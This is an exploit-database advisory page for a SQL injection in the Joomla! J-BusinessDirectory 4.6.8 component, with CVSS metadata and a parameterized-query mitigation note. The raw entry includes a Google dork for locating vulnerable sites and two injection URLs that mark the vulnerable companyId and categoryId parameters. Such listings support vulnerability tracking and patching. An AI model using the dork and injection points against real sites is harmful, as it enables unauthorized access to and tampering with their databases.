header-logo
Suggest Exploit
vendor:
J-BusinessDirectory
by:
Ihsan Sencan
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: J-BusinessDirectory
Affected Version From: 4.6.8
Affected Version To: 4.6.8
Patch Exists: NO
Related CWE: N/A
CPE: a:cmsjunkie:j-businessdirectory:4.6.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
2017

Joomla! Component J-BusinessDirectory v4.6.8 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component J-BusinessDirectory v4.6.8. An attacker can send malicious SQL queries to the application by manipulating the 'companyId' and 'categoryId' parameters in the 'index.php' file. This can allow the attacker to access or modify the application's data.

Mitigation:

Developers should always use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component J-BusinessDirectory v4.6.8 - SQL Injection
# Google Dork: inurl:index.php?option=com_jbusinessdirectory
# Date: 21.02.2017
# Vendor Homepage:  http://www.cmsjunkie.com/
# Software Buy: http://www.cmsjunkie.com/ajax/index/options/product_id/73/
# Demo: http://demo.cmsjunkie.com/j-businessdirectory/
# Version: 4.6.8
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jbusinessdirectory&view=companies&companyId=[SQL]
# http://localhost/[PATH]/index.php?option=com_jbusinessdirectory&view=search&searchkeyword=1&categoryId=[SQL]
# Etc...
# # # # #